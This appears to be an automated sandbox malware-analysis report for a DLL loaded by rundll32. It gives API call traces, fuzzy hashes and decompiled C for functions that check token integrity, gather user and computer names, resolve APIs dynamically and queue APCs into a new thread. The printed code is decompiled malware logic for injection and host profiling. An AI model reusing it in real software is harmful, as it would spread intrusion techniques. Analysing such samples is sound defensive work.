ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0444A2FC,00000000), ref: 04446361
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,04442582,?,00000001), ref: 0444637A
wsprintfA.USER32 ref: 044463FA
memset.NTDLL ref: 0444642A
RtlInitializeCriticalSection.NTDLL(053495F0), ref: 0444643B
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 04446464
wsprintfA.USER32 ref: 04446494

Part of subcall function 04444BDF: GetUserNameW.ADVAPI32(00000000,044464B9), ref: 04444C16
Part of subcall function 04444BDF: RtlAllocateHeap.NTDLL(00000000,044464B9), ref: 04444C2D
Part of subcall function 04444BDF: GetUserNameW.ADVAPI32(00000000,044464B9), ref: 04444C3A
Part of subcall function 04444BDF: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,044464B9,?,?,?,?,?,04442582,?,00000001), ref: 04444C5B
Part of subcall function 04444BDF: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04444C82
Part of subcall function 04444BDF: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04444C96
Part of subcall function 04444BDF: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04444CA3
Part of subcall function 04444BDF: HeapFree.KERNEL32(00000000,00000000), ref: 04444CC1

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 053f7e5e0e479e1228c3571cff920ad9ee64dae3f27213f7a094875023b3d944
Instruction ID: 931a0eac99dbea9cbd1ab84738351bd47d28753139f255828f1a3c765b656572
Opcode Fuzzy Hash: 053f7e5e0e479e1228c3571cff920ad9ee64dae3f27213f7a094875023b3d944
Instruction Fuzzy Hash: 2051CF75A80115ABFF20DFA9D845BAFB3A8EBC5714F12402AE904E7640EB7CFD419B50

Uniqueness

Uniqueness Score: -1.00%

Function 044435A2, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E044435A2(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x444a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04441EF5(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E044430D1(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x044435af
0x044435b6
0x044435bd
0x044435d1
0x044435dc
0x044435f4
0x04443601
0x04443604
0x04443609
0x04443614
0x04443618
0x04443627
0x0444362b
0x04443647
0x04443647
0x0444364b
0x0444364b
0x04443650
0x04443654
0x0444365a
0x0444365b
0x04443662
0x04443668

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 044435D4
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 044435F4
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04443604
CloseHandle.KERNEL32(00000000), ref: 04443654

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 04443627
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0444362F
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0444363F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: c80cb1562a9d9a78490acd2fdfb125e2c5885e16aac36c63fa1b572b9fd78906
Instruction ID: 55f651753e2092b5bc132159e1918cece1ea5d179f0f7ed9e1ef8e6e3da49347
Opcode Fuzzy Hash: c80cb1562a9d9a78490acd2fdfb125e2c5885e16aac36c63fa1b572b9fd78906
Instruction Fuzzy Hash: A1213C79A00219FFFF109F94DC84EAEBBB9EB84704F104066EA11A6251C7759E44EB60

Uniqueness

Uniqueness Score: -1.00%

Function 044424B6, Relevance: 10.6, APIs: 7, Instructions: 73
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E044424B6(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x444a290 = _t14;
				if(_t14 != 0) {
					 *0x444a180 = GetTickCount();
					_t16 = E044445D9(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L04447F3A();
						_t41 = _t18 + _t20;
						_t22 = E0444326F(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed
					} while (_t22 == 1);
					_t25 =  *0x444a2ac; // 0x2dc
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x444a2b8 = 1; // executed
						}
					}
					_t16 = E044462DD(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x044424b6
0x044424cb
0x044424d3
0x044424d8
0x044424eb
0x044424f0
0x044424f7
0x04442582
0x04442588
0x00000000
0x00000000
0x00000000
0x044424fd
0x044424fd
0x04442502
0x04442508
0x0444250e
0x04442518
0x0444251c
0x0444251d
0x04442522
0x04442523
0x04442524
0x04442529
0x0444252f
0x0444253a
0x04442541
0x04442547
0x0444254c
0x04442553
0x04442557
0x0444255f
0x04442567
0x04442569
0x04442569
0x04442571
0x04442573
0x04442573
0x04442571
0x0444257d
0x00000000
0x0444257d
0x044424dc
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 044424CB
GetTickCount.KERNEL32 ref: 044424E2
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04442502
SwitchToThread.KERNEL32(?,00000001), ref: 04442508
_aullrem.NTDLL(?,?,00000013,00000000), ref: 04442524
Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 04442541
IsWow64Process.KERNEL32(000002DC,?,?,00000001), ref: 0444255F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 82be729072ba38b5e062603935b3d6a129420d3f691c749f9ed80a1ad5ad8475
Instruction ID: 47ca538291f9f4ba610125ab93ebd7288b452fcc789b8194999fc17b7cac97b0
Opcode Fuzzy Hash: 82be729072ba38b5e062603935b3d6a129420d3f691c749f9ed80a1ad5ad8475
Instruction Fuzzy Hash: 2321D5B6A40204AFFB109FB5EC99A5BB7D8FBC4394F40492EF515C2240E779EC049B61

Uniqueness

Uniqueness Score: -1.00%

Function 044439E6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E044439E6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x444a2d4; // 0xefd5a8
				_t1 = _t9 + 0x444b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E04441167(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5349631
					_t40 = E04441EF5(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E044423A8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E044430D1(_t40);
						_t42 = E0444494C(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E044430D1(_t36);
							_t36 = _t42;
						}
						_t43 = E04441F79(_t36, _t33);
						if(_t43 != 0) {
							E044430D1(_t36);
							_t36 = _t43;
						}
					}
					E044430D1(_t28);
				}
				return _t36;
			}

0x044439e6
0x044439e9
0x044439ea
0x044439f1
0x044439f8
0x044439ff
0x04443a03
0x04443a0a
0x04443a11
0x04443a16
0x04443a1e
0x04443a28
0x04443a2c
0x04443a30
0x04443a36
0x04443a3b
0x04443a45
0x04443a4b
0x04443a4d
0x04443a64
0x04443a68
0x04443a6b
0x04443a70
0x04443a70
0x04443a79
0x04443a7d
0x04443a80
0x04443a85
0x04443a85
0x04443a7d
0x04443a88
0x04443a8d
0x04443a93

APIs

Part of subcall function 04441167: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044439FF,253D7325,00000000,00000000,?,00000000,044470F6), ref: 044411CE
Part of subcall function 04441167: sprintf.NTDLL ref: 044411EF

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A11
lstrlen.KERNEL32(00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A19

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

strcpy.NTDLL ref: 04443A30
lstrcat.KERNEL32(00000000,00000000), ref: 04443A3B

Part of subcall function 044423A8: lstrlen.KERNEL32(00000000,00000000,044470F6,00000000,?,04443A4A,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 044423B9

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 04443A58

Part of subcall function 0444494C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04443A64,00000000,?,00000000,044470F6,00000000,05349630), ref: 04444956
Part of subcall function 0444494C: _snprintf.NTDLL ref: 044449B4

Strings

=, xrefs: 04443A52

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 1616e9f05f7c76655d77e181a6ae609680baa3966423cc7dbef737090fc96292
Instruction ID: 1b5ef3f7f219359f2dc38a382e39dfeb69ed0ff94913c37136e21593741d2098
Opcode Fuzzy Hash: 1616e9f05f7c76655d77e181a6ae609680baa3966423cc7dbef737090fc96292
Instruction Fuzzy Hash: 7F11063770152477BF12AFB69C84C6F36AD9EC5A68305011BFD00A7202CE39FD0157A0

Uniqueness

Uniqueness Score: -1.00%

Function 04445856, Relevance: 9.1, APIs: 6, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04442238: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053489D0,04445886,?,?,?,?,?,?,?,?,?,?,?,04445886), ref: 04442304

Part of subcall function 04442977: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 044429B4
Part of subcall function 04442977: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 044429E5

SysAllocString.OLEAUT32(?), ref: 044458B2
SysAllocString.OLEAUT32(0070006F), ref: 044458C6
SysAllocString.OLEAUT32(00000000), ref: 044458D8
SysFreeString.OLEAUT32(00000000), ref: 0444593C
SysFreeString.OLEAUT32(00000000), ref: 0444594B
SysFreeString.OLEAUT32(00000000), ref: 04445956

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: d2098624a8f82991baa28840930bdeea0c90614f4cce27c50ecb89a076d295c1
Instruction ID: 13d3a87c7cd00154712d3672be5ac9b730cff358c88a80041f9489ed67e74a74
Opcode Fuzzy Hash: d2098624a8f82991baa28840930bdeea0c90614f4cce27c50ecb89a076d295c1
Instruction Fuzzy Hash: C4311D36900609AFEF01DFB9C844A9FB7B5EF89314F144466EA10EB210DB75AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 702E1B2C, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702E1B2C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E702E196E(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x702e41d0 + 0x702e5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x702e41d0 + 0x702e50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E702E2117(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x702e41d0 + 0x702e50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x702e41d0 + 0x702e5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x702e41d0 + 0x702e5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x702e41d0 + 0x702e512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E702E12CE(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x702e1b3a
0x702e1b3e
0x702e1bff
0x702e1b44
0x702e1b5c
0x702e1b6b
0x702e1b72
0x702e1b76
0x702e1b79
0x702e1bf7
0x702e1bf8
0x702e1b7b
0x702e1b88
0x702e1b8c
0x702e1b8f
0x00000000
0x702e1b91
0x702e1b9e
0x702e1ba2
0x702e1ba5
0x00000000
0x702e1ba7
0x702e1bb4
0x702e1bb8
0x702e1bbb
0x00000000
0x702e1bbd
0x702e1bca
0x702e1bce
0x702e1bd1
0x00000000
0x702e1bd3
0x702e1bd9
0x702e1bdf
0x702e1be4
0x702e1beb
0x702e1bee
0x00000000
0x702e1bf0
0x702e1bf3
0x702e1bf3
0x702e1bee
0x702e1bd1
0x702e1bbb
0x702e1ba5
0x702e1b8f
0x702e1b79
0x702e1c0d

APIs

Part of subcall function 702E196E: HeapAlloc.KERNEL32(00000000,?,702E10BC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E197A

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,702E2028,?,?,?,?,00000002,00000000,?,?), ref: 702E1B50
GetProcAddress.KERNEL32(00000000,?), ref: 702E1B72
GetProcAddress.KERNEL32(00000000,?), ref: 702E1B88
GetProcAddress.KERNEL32(00000000,?), ref: 702E1B9E
GetProcAddress.KERNEL32(00000000,?), ref: 702E1BB4
GetProcAddress.KERNEL32(00000000,?), ref: 702E1BCA

Part of subcall function 702E12CE: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 702E132B
Part of subcall function 702E12CE: memset.NTDLL ref: 702E134D

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: f1227e4a10b74144a2c8fde2eea81d10672ab4c888b51b15b8b61174771b1cee
Instruction ID: 8f2096b09f0508b7c51e6d49a8ed75cdc53c661afe74815bbaacf14821d1cbb1
Opcode Fuzzy Hash: f1227e4a10b74144a2c8fde2eea81d10672ab4c888b51b15b8b61174771b1cee
Instruction Fuzzy Hash: 1A2110B36802569FD710DF6ACD8CF5E77FCFB09648B1044A9E91ACB211E770E9119BA0

Uniqueness

Uniqueness Score: -1.00%

Function 702E1850, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x702e4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x702e418c;
						if( *0x702e418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x702e4198;
								if( *0x702e4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x702e418c);
						}
						HeapDestroy( *0x702e4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x702e4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x702e4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x702e41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E702E17B5(E702E13A6, E702E1000(_a12, 1, 0x702e4198, _t41));
							 *0x702e418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x702e1853
0x702e185f
0x702e1861
0x702e1864
0x702e18da
0x702e18e0
0x702e18e2
0x702e18e4
0x702e18ea
0x702e18ec
0x702e18f1
0x702e18f4
0x702e18ff
0x702e1901
0x00000000
0x00000000
0x702e1903
0x702e1906
0x702e1908
0x00000000
0x00000000
0x00000000
0x702e1908
0x702e1910
0x702e1910
0x702e191c
0x702e191c
0x702e1866
0x702e1867
0x702e1887
0x702e188d
0x702e188f
0x702e1894
0x702e18d0
0x702e18d0
0x702e1896
0x702e189e
0x702e18a5
0x702e18af
0x702e18bb
0x702e18c2
0x702e18c7
0x702e18cc
0x00000000
0x702e18cc
0x702e18c7
0x702e1894
0x702e1867
0x702e1929

APIs

InterlockedIncrement.KERNEL32(702E4188), ref: 702E1872
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 702E1887

Part of subcall function 702E17B5: CreateThread.KERNELBASE ref: 702E17CC
Part of subcall function 702E17B5: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 702E17E1
Part of subcall function 702E17B5: GetLastError.KERNEL32(00000000), ref: 702E17EC
Part of subcall function 702E17B5: TerminateThread.KERNEL32(00000000,00000000), ref: 702E17F6
Part of subcall function 702E17B5: CloseHandle.KERNEL32(00000000), ref: 702E17FD
Part of subcall function 702E17B5: SetLastError.KERNEL32(00000000), ref: 702E1806

InterlockedDecrement.KERNEL32(702E4188), ref: 702E18DA
SleepEx.KERNEL32(00000064,00000001), ref: 702E18F4
CloseHandle.KERNEL32 ref: 702E1910
HeapDestroy.KERNEL32 ref: 702E191C

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 98b7fa3bf59f73f5299d9c421537af85a1f7ebe3f67a919e782e4ed49dbf1dc0
Instruction ID: 92459b05de784155582749b53f6d9520565a7690153bf317566d6125ae83623a
Opcode Fuzzy Hash: 98b7fa3bf59f73f5299d9c421537af85a1f7ebe3f67a919e782e4ed49dbf1dc0
Instruction Fuzzy Hash: C4216D73B80206AFCB018F6BDCCCB4D7BB9EB597617A04179E50ADA250D7708D60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 702E17B5, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702E17B5(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x702e41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x702e17cc
0x702e17d2
0x702e17d6
0x702e17e1
0x702e17e9
0x702e17f2
0x702e17f6
0x702e17fd
0x702e1804
0x702e1806
0x702e180c
0x702e17e9
0x702e1810

APIs

CreateThread.KERNELBASE ref: 702E17CC
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 702E17E1
GetLastError.KERNEL32(00000000), ref: 702E17EC
TerminateThread.KERNEL32(00000000,00000000), ref: 702E17F6
CloseHandle.KERNEL32(00000000), ref: 702E17FD
SetLastError.KERNEL32(00000000), ref: 702E1806

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: d49165bec49ba5b2b646c45fbca65677142c096c08d607b962b224863b782ff2
Instruction ID: 1601947389d0e873990470ecc92f0ead80cd8e231fbf17dc02a9eabb6a811b85
Opcode Fuzzy Hash: d49165bec49ba5b2b646c45fbca65677142c096c08d607b962b224863b782ff2
Instruction Fuzzy Hash: 08F0FE33289221BBD7129FA2CC8CF5EBB69EB08B53F204514F60995160D7318954ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 04445B1E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04445B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x444a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04442DDF( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04444721(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E044430D1(_a8);
						goto L29;
					}
					_t64 =  *0x444a2cc; // 0x5349cc0
					_t16 = _t64 + 0xc; // 0x5349db4
					_t65 = E04442DDF(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d044490, executed
						_t67 = E0444543F(_t97,  *_t33, _t91, _a8,  *0x444a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x444a2d4; // 0xefd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x444b9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x444b907; // 0x55434b48
								_t69 = _t34;
							}
							if(E0444602C(_t69,  *0x444a384,  *0x444a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x444a2d4; // 0xefd5a8
									_t44 = _t71 + 0x444b892; // 0x74666f53
									_t73 = E04442DDF(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d044490
